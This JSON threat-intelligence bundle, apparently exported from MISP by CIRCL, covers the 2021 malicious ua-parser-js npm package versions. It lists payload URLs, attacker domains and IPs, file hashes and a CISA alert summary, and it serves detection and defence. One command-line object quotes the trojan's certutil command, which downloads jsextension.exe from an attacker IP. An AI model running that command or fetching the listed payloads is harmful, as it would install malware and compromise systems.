597 lines
26 KiB
JSON
597 lines
26 KiB
JSON
|
{
|
||
|
"type": "bundle",
|
||
|
"id": "bundle--ad7665ec-fef2-44eb-a019-b1b25a8aec05",
|
||
|
"objects": [
|
||
|
{
|
||
|
"type": "identity",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:25:55.000Z",
|
||
|
"modified": "2021-10-24T08:25:55.000Z",
|
||
|
"name": "CIRCL",
|
||
|
"identity_class": "organization"
|
||
|
},
|
||
|
{
|
||
|
"type": "report",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "report--ad7665ec-fef2-44eb-a019-b1b25a8aec05",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:25:55.000Z",
|
||
|
"modified": "2021-10-24T08:25:55.000Z",
|
||
|
"name": "Malware Discovered in Popular NPM Package, ua-parser-js",
|
||
|
"published": "2021-10-24T08:26:47Z",
|
||
|
"object_refs": [
|
||
|
"observed-data--e9d82a66-46bd-4f0e-aeac-17349abddeb0",
|
||
|
"url--e9d82a66-46bd-4f0e-aeac-17349abddeb0",
|
||
|
"observed-data--508a294c-876e-4a8a-a3bd-a3de15e10325",
|
||
|
"url--508a294c-876e-4a8a-a3bd-a3de15e10325",
|
||
|
"observed-data--f51805cb-5fec-4ce1-b7ae-1d1206720542",
|
||
|
"url--f51805cb-5fec-4ce1-b7ae-1d1206720542",
|
||
|
"indicator--b6541760-d7e6-432b-9715-eae2ce06ad83",
|
||
|
"indicator--3e4cc221-dbb9-4e64-9523-800d8af8f972",
|
||
|
"indicator--1b1a28a9-2b47-43a3-92b9-c9353497f429",
|
||
|
"indicator--9163b990-5b87-413c-a8e7-f616b908157f",
|
||
|
"x-misp-object--30866961-7eda-4bb7-a5e8-cb0bfeebce4c",
|
||
|
"x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
|
||
|
"x-misp-object--57d3ed7e-eda9-4e5e-b7ac-a813415e9006",
|
||
|
"indicator--116cfff2-f422-4b59-a5aa-630fc443be4b",
|
||
|
"indicator--e1f2c049-da88-4238-9dde-4134209c1364",
|
||
|
"indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
|
||
|
"indicator--bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b",
|
||
|
"x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5",
|
||
|
"relationship--1b221186-0b2e-43f8-ad16-b43e8dcb3e15",
|
||
|
"relationship--67829f87-338d-4977-a756-a1f6a51c33cb",
|
||
|
"relationship--b4d636f2-5c71-4b13-bc2f-e491e0321e2f",
|
||
|
"relationship--5a5b4705-da6a-45f8-9644-dfed1924f3ae",
|
||
|
"relationship--e09215ed-b2e0-4570-b605-5b8d0d47567f",
|
||
|
"relationship--d3508c75-80de-4c93-8208-8184bbc3537a",
|
||
|
"relationship--805d60d8-89a1-47d8-8240-5333b49f091d",
|
||
|
"relationship--c3be4870-b16b-43ae-8efa-63c71f159530",
|
||
|
"relationship--b5470b30-08ef-4e40-a3c8-dbb20071e107",
|
||
|
"relationship--2cdcf379-3e29-4acb-953e-c386a6d338fe",
|
||
|
"relationship--adec1637-7349-426a-9e8b-e324482c3a29",
|
||
|
"relationship--1d73293e-adaf-4b1e-afd5-ed5d3d0fe188"
|
||
|
],
|
||
|
"labels": [
|
||
|
"Threat-Report",
|
||
|
"misp:tool=\"MISP-STIX-Converter\"",
|
||
|
"type:OSINT",
|
||
|
"osint:lifetime=\"perpetual\"",
|
||
|
"osint:certainty=\"50\"",
|
||
|
"misp-galaxy:mitre-attack-pattern=\"Compromise Software Supply Chain - T1195.002\"",
|
||
|
"misp-galaxy:mitre-attack-pattern=\"Compromise Software Dependencies and Development Tools - T1195.001\""
|
||
|
],
|
||
|
"object_marking_refs": [
|
||
|
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "observed-data",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "observed-data--e9d82a66-46bd-4f0e-aeac-17349abddeb0",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T07:52:52.000Z",
|
||
|
"modified": "2021-10-24T07:52:52.000Z",
|
||
|
"first_observed": "2021-10-24T07:52:52Z",
|
||
|
"last_observed": "2021-10-24T07:52:52Z",
|
||
|
"number_observed": 1,
|
||
|
"object_refs": [
|
||
|
"url--e9d82a66-46bd-4f0e-aeac-17349abddeb0"
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"link\"",
|
||
|
"misp:category=\"External analysis\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "url",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "url--e9d82a66-46bd-4f0e-aeac-17349abddeb0",
|
||
|
"value": "https://github.com/advisories/GHSA-pjwm-rvh2-c87w"
|
||
|
},
|
||
|
{
|
||
|
"type": "observed-data",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "observed-data--508a294c-876e-4a8a-a3bd-a3de15e10325",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T07:54:51.000Z",
|
||
|
"modified": "2021-10-24T07:54:51.000Z",
|
||
|
"first_observed": "2021-10-24T07:54:51Z",
|
||
|
"last_observed": "2021-10-24T07:54:51Z",
|
||
|
"number_observed": 1,
|
||
|
"object_refs": [
|
||
|
"url--508a294c-876e-4a8a-a3bd-a3de15e10325"
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"link\"",
|
||
|
"misp:category=\"External analysis\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "url",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "url--508a294c-876e-4a8a-a3bd-a3de15e10325",
|
||
|
"value": "https://github.com/faisalman/ua-parser-js/issues/536"
|
||
|
},
|
||
|
{
|
||
|
"type": "observed-data",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "observed-data--f51805cb-5fec-4ce1-b7ae-1d1206720542",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T07:58:30.000Z",
|
||
|
"modified": "2021-10-24T07:58:30.000Z",
|
||
|
"first_observed": "2021-10-24T07:58:30Z",
|
||
|
"last_observed": "2021-10-24T07:58:30Z",
|
||
|
"number_observed": 1,
|
||
|
"object_refs": [
|
||
|
"url--f51805cb-5fec-4ce1-b7ae-1d1206720542"
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"url\"",
|
||
|
"misp:category=\"Payload delivery\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "url",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "url--f51805cb-5fec-4ce1-b7ae-1d1206720542",
|
||
|
"value": "http://159.148.186.228/download/jsextension.exe"
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T07:59:03.000Z",
|
||
|
"modified": "2021-10-24T07:59:03.000Z",
|
||
|
"pattern": "[url:value = 'https://citationsherbe.at/sdd.dll']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2021-10-24T07:59:03Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "Payload delivery"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"url\"",
|
||
|
"misp:category=\"Payload delivery\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--3e4cc221-dbb9-4e64-9523-800d8af8f972",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T07:59:45.000Z",
|
||
|
"modified": "2021-10-24T07:59:45.000Z",
|
||
|
"pattern": "[domain-name:value = 'citationsherbe.at']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2021-10-24T07:59:45Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "Network activity"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"domain\"",
|
||
|
"misp:category=\"Network activity\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--1b1a28a9-2b47-43a3-92b9-c9353497f429",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:00:44.000Z",
|
||
|
"modified": "2021-10-24T08:00:44.000Z",
|
||
|
"description": "sdd.dll",
|
||
|
"pattern": "[file:hashes.SHA256 = '2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2021-10-24T08:00:44Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "Artifacts dropped"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"sha256\"",
|
||
|
"misp:category=\"Artifacts dropped\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--9163b990-5b87-413c-a8e7-f616b908157f",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:01:14.000Z",
|
||
|
"modified": "2021-10-24T08:01:14.000Z",
|
||
|
"description": "jsextension.exe",
|
||
|
"pattern": "[file:hashes.SHA256 = '47dded0efc230c3536f4db1e2e476afd3eda8d8ea0537db69d432322cdbac9ca']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2021-10-24T08:01:14Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "Artifacts dropped"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:type=\"sha256\"",
|
||
|
"misp:category=\"Artifacts dropped\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "x-misp-object",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "x-misp-object--30866961-7eda-4bb7-a5e8-cb0bfeebce4c",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:25:55.000Z",
|
||
|
"modified": "2021-10-24T08:25:55.000Z",
|
||
|
"labels": [
|
||
|
"misp:name=\"report\"",
|
||
|
"misp:meta-category=\"misc\""
|
||
|
],
|
||
|
"x_misp_attributes": [
|
||
|
{
|
||
|
"type": "link",
|
||
|
"object_relation": "link",
|
||
|
"value": "https://us-cert.cisa.gov/ncas/current-activity/2021/10/22/malware-discovered-popular-npm-package-ua-parser-js",
|
||
|
"category": "External analysis",
|
||
|
"uuid": "10d9ac50-3208-4cff-9d07-c2bec1c192c8"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "summary",
|
||
|
"value": "Versions of a popular NPM package named ua-parser-js was found to contain malicious code. ua-parser-js is used in apps and websites to discover the type of device or browser a person is using from User-Agent data. A computer or device with the affected software installed or running could allow a remote attacker to obtain sensitive information or take control of the system. \r\n\r\nCISA urges users and administers using compromised ua-parser-js versions 0.7.29, 0.8.0, and 1.0.0 to update to the respective patched versions: 0.7.30, 0.8.1, 1.0.1 \r\n\r\nFor more information, see Embedded malware in ua-parser-js.",
|
||
|
"category": "Other",
|
||
|
"uuid": "5faebe54-7492-4f23-99f8-edf5e24e5424"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "type",
|
||
|
"value": "Alert",
|
||
|
"category": "Other",
|
||
|
"uuid": "0e1e4035-31a1-4df6-8aa9-2a6208f7f601"
|
||
|
}
|
||
|
],
|
||
|
"x_misp_meta_category": "misc",
|
||
|
"x_misp_name": "report"
|
||
|
},
|
||
|
{
|
||
|
"type": "x-misp-object",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:23:57.000Z",
|
||
|
"modified": "2021-10-24T08:23:57.000Z",
|
||
|
"labels": [
|
||
|
"misp:name=\"command-line\"",
|
||
|
"misp:meta-category=\"misc\""
|
||
|
],
|
||
|
"x_misp_attributes": [
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "value",
|
||
|
"value": "certutil -rulcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe",
|
||
|
"category": "Other",
|
||
|
"uuid": "974258e7-2e79-413c-9be8-08698653b87b"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "description",
|
||
|
"value": "The trojan try to execute in the cmd",
|
||
|
"category": "Other",
|
||
|
"uuid": "e3df3b20-a215-40d4-ae1a-a9ed768de240"
|
||
|
}
|
||
|
],
|
||
|
"x_misp_meta_category": "misc",
|
||
|
"x_misp_name": "command-line"
|
||
|
},
|
||
|
{
|
||
|
"type": "x-misp-object",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "x-misp-object--57d3ed7e-eda9-4e5e-b7ac-a813415e9006",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:11:49.000Z",
|
||
|
"modified": "2021-10-24T08:11:49.000Z",
|
||
|
"labels": [
|
||
|
"misp:name=\"command-line\"",
|
||
|
"misp:meta-category=\"misc\"",
|
||
|
"cycat:scope=\"detection\""
|
||
|
],
|
||
|
"x_misp_attributes": [
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "value",
|
||
|
"value": "npm show ua-parser-js time",
|
||
|
"category": "Other",
|
||
|
"uuid": "4834122d-b43b-4b8d-a9d1-3085611ebaec"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "description",
|
||
|
"value": "To check the time when the package was installed",
|
||
|
"category": "Other",
|
||
|
"uuid": "542061ee-8993-44ef-8261-f27f25dc9067"
|
||
|
}
|
||
|
],
|
||
|
"x_misp_meta_category": "misc",
|
||
|
"x_misp_name": "command-line"
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--116cfff2-f422-4b59-a5aa-630fc443be4b",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:21:22.000Z",
|
||
|
"modified": "2021-10-24T08:21:22.000Z",
|
||
|
"pattern": "[domain-name:value = 'citationsherbe.at' AND domain-name:resolves_to_refs[*].value = '95.213.165.20']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2021-10-24T08:21:22Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "network"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:name=\"domain-ip\"",
|
||
|
"misp:meta-category=\"network\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--e1f2c049-da88-4238-9dde-4134209c1364",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:03:02.000Z",
|
||
|
"modified": "2021-10-24T08:03:02.000Z",
|
||
|
"pattern": "[domain-name:resolves_to_refs[*].value = '159.148.186.228']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2021-10-24T08:03:02Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "network"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:name=\"domain-ip\"",
|
||
|
"misp:meta-category=\"network\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:21:44.000Z",
|
||
|
"modified": "2021-10-24T08:21:44.000Z",
|
||
|
"description": "Vulnerable npm package UAParser.js - '0.7.29': '2021-10-22T12:15:21.378Z',\r\n'0.7.30': '2021-10-22T16:16:08.807Z',\r\n\r\n'0.8.0': '2021-10-22T12:16:06.877Z',\r\n'0.8.1': '2021-10-22T16:23:53.062Z',\r\n\r\n'1.0.0': '2021-10-22T12:16:19.726Z',\r\n'1.0.1': '2021-10-22T16:26:19.004Z',\r\n",
|
||
|
"pattern": "[file:x_misp_pattern_in_file = 'ua-parser-js']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2021-10-24T08:21:44Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "file"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:name=\"file\"",
|
||
|
"misp:meta-category=\"file\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "indicator",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "indicator--bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:17:31.000Z",
|
||
|
"modified": "2021-10-24T08:17:31.000Z",
|
||
|
"pattern": "[file:hashes.MD5 = 'de8b54a938ac18f15cad804d79a0e19d' AND file:hashes.SHA1 = 'b6004c62e2d9dbad9cfd5f7e18647ac983788766' AND file:hashes.SHA256 = '2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd']",
|
||
|
"pattern_type": "stix",
|
||
|
"pattern_version": "2.1",
|
||
|
"valid_from": "2021-10-24T08:17:31Z",
|
||
|
"kill_chain_phases": [
|
||
|
{
|
||
|
"kill_chain_name": "misp-category",
|
||
|
"phase_name": "file"
|
||
|
}
|
||
|
],
|
||
|
"labels": [
|
||
|
"misp:name=\"file\"",
|
||
|
"misp:meta-category=\"file\"",
|
||
|
"misp:to_ids=\"True\""
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"type": "x-misp-object",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5",
|
||
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
||
|
"created": "2021-10-24T08:22:57.000Z",
|
||
|
"modified": "2021-10-24T08:22:57.000Z",
|
||
|
"labels": [
|
||
|
"misp:name=\"virustotal-report\"",
|
||
|
"misp:meta-category=\"misc\""
|
||
|
],
|
||
|
"x_misp_attributes": [
|
||
|
{
|
||
|
"type": "datetime",
|
||
|
"object_relation": "last-submission",
|
||
|
"value": "2021-10-24T04:03:55+00:00",
|
||
|
"category": "Other",
|
||
|
"comment": "sdd.dll",
|
||
|
"uuid": "a38e6a9c-1573-4b68-b9ee-dfdda8eb57ed"
|
||
|
},
|
||
|
{
|
||
|
"type": "link",
|
||
|
"object_relation": "permalink",
|
||
|
"value": "https://www.virustotal.com/gui/file/2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd/detection/f-2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd-1635048235",
|
||
|
"category": "External analysis",
|
||
|
"comment": "sdd.dll",
|
||
|
"uuid": "37fe948f-89f7-4316-bdf3-c88fdbd16b11"
|
||
|
},
|
||
|
{
|
||
|
"type": "text",
|
||
|
"object_relation": "detection-ratio",
|
||
|
"value": "23/50",
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "sdd.dll",
|
||
|
"uuid": "b36b2447-2d9b-4993-b23b-2ff46ad63d7c"
|
||
|
}
|
||
|
],
|
||
|
"x_misp_meta_category": "misc",
|
||
|
"x_misp_name": "virustotal-report"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--1b221186-0b2e-43f8-ad16-b43e8dcb3e15",
|
||
|
"created": "2021-10-24T08:25:55.000Z",
|
||
|
"modified": "2021-10-24T08:25:55.000Z",
|
||
|
"relationship_type": "alerts",
|
||
|
"source_ref": "x-misp-object--30866961-7eda-4bb7-a5e8-cb0bfeebce4c",
|
||
|
"target_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--67829f87-338d-4977-a756-a1f6a51c33cb",
|
||
|
"created": "2021-10-24T08:09:17.000Z",
|
||
|
"modified": "2021-10-24T08:09:17.000Z",
|
||
|
"relationship_type": "is-in-relation-with",
|
||
|
"source_ref": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
|
||
|
"target_ref": "indicator--e1f2c049-da88-4238-9dde-4134209c1364"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--b4d636f2-5c71-4b13-bc2f-e491e0321e2f",
|
||
|
"created": "2021-10-24T08:10:03.000Z",
|
||
|
"modified": "2021-10-24T08:10:03.000Z",
|
||
|
"relationship_type": "downloads",
|
||
|
"source_ref": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
|
||
|
"target_ref": "observed-data--f51805cb-5fec-4ce1-b7ae-1d1206720542"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--5a5b4705-da6a-45f8-9644-dfed1924f3ae",
|
||
|
"created": "2021-10-24T08:23:57.000Z",
|
||
|
"modified": "2021-10-24T08:23:57.000Z",
|
||
|
"relationship_type": "related-to",
|
||
|
"source_ref": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
|
||
|
"target_ref": "indicator--9163b990-5b87-413c-a8e7-f616b908157f"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--e09215ed-b2e0-4570-b605-5b8d0d47567f",
|
||
|
"created": "2021-10-24T08:11:49.000Z",
|
||
|
"modified": "2021-10-24T08:11:49.000Z",
|
||
|
"relationship_type": "identifies",
|
||
|
"source_ref": "x-misp-object--57d3ed7e-eda9-4e5e-b7ac-a813415e9006",
|
||
|
"target_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--d3508c75-80de-4c93-8208-8184bbc3537a",
|
||
|
"created": "2021-10-24T08:15:51.000Z",
|
||
|
"modified": "2021-10-24T08:15:51.000Z",
|
||
|
"relationship_type": "is-in-relation-with",
|
||
|
"source_ref": "indicator--116cfff2-f422-4b59-a5aa-630fc443be4b",
|
||
|
"target_ref": "indicator--3e4cc221-dbb9-4e64-9523-800d8af8f972"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--805d60d8-89a1-47d8-8240-5333b49f091d",
|
||
|
"created": "2021-10-24T08:21:22.000Z",
|
||
|
"modified": "2021-10-24T08:21:22.000Z",
|
||
|
"relationship_type": "related-to",
|
||
|
"source_ref": "indicator--116cfff2-f422-4b59-a5aa-630fc443be4b",
|
||
|
"target_ref": "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--c3be4870-b16b-43ae-8efa-63c71f159530",
|
||
|
"created": "2021-10-24T08:06:58.000Z",
|
||
|
"modified": "2021-10-24T08:06:58.000Z",
|
||
|
"relationship_type": "executes",
|
||
|
"source_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
|
||
|
"target_ref": "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--b5470b30-08ef-4e40-a3c8-dbb20071e107",
|
||
|
"created": "2021-10-24T08:16:24.000Z",
|
||
|
"modified": "2021-10-24T08:16:24.000Z",
|
||
|
"relationship_type": "downloads",
|
||
|
"source_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
|
||
|
"target_ref": "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--2cdcf379-3e29-4acb-953e-c386a6d338fe",
|
||
|
"created": "2021-10-24T08:21:44.000Z",
|
||
|
"modified": "2021-10-24T08:21:44.000Z",
|
||
|
"relationship_type": "describes",
|
||
|
"source_ref": "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
|
||
|
"target_ref": "observed-data--508a294c-876e-4a8a-a3bd-a3de15e10325"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--adec1637-7349-426a-9e8b-e324482c3a29",
|
||
|
"created": "2021-10-24T08:17:32.000Z",
|
||
|
"modified": "2021-10-24T08:17:32.000Z",
|
||
|
"relationship_type": "analysed-with",
|
||
|
"source_ref": "indicator--bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b",
|
||
|
"target_ref": "x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5"
|
||
|
},
|
||
|
{
|
||
|
"type": "relationship",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "relationship--1d73293e-adaf-4b1e-afd5-ed5d3d0fe188",
|
||
|
"created": "2021-10-24T08:22:57.000Z",
|
||
|
"modified": "2021-10-24T08:22:57.000Z",
|
||
|
"relationship_type": "related-to",
|
||
|
"source_ref": "x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5",
|
||
|
"target_ref": "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83"
|
||
|
},
|
||
|
{
|
||
|
"type": "marking-definition",
|
||
|
"spec_version": "2.1",
|
||
|
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
|
||
|
"created": "2017-01-20T00:00:00.000Z",
|
||
|
"definition_type": "tlp",
|
||
|
"name": "TLP:WHITE",
|
||
|
"definition": {
|
||
|
"tlp": "white"
|
||
|
}
|
||
|
}
|
||
|
]
|
||
|
}
|